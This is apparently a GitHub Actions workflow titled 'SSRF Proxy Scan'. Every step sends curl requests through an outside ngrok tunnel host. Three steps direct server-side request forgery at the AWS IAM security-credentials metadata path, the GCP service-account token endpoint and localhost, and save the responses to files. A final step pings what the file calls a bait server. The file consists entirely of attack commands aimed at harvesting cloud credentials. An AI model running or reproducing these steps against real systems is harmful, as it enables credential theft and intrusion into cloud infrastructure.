name: SSRF Proxy Scan

on:
  workflow_dispatch:

jobs:
  ssrf-via-proxy:
    runs-on: ubuntu-latest
    steps:
      - name: SSRF to AWS metadata via proxy
        run: |
          curl -s "https://cd13e3febd7f.ngrok-free.app/proxy?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/" | tee aws.txt

      - name: SSRF to GCP metadata via proxy
        run: |
          curl -s "https://cd13e3febd7f.ngrok-free.app/proxy?target=http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" | tee gcp.txt

      - name: SSRF to localhost
        run: |
          curl -s "https://cd13e3febd7f.ngrok-free.app/proxy?target=http://127.0.0.1:80" | tee localhost.txt

      - name: Ping Bait Server
        run: |
          curl -s "https://cd13e3febd7f.ngrok-free.app/ping"
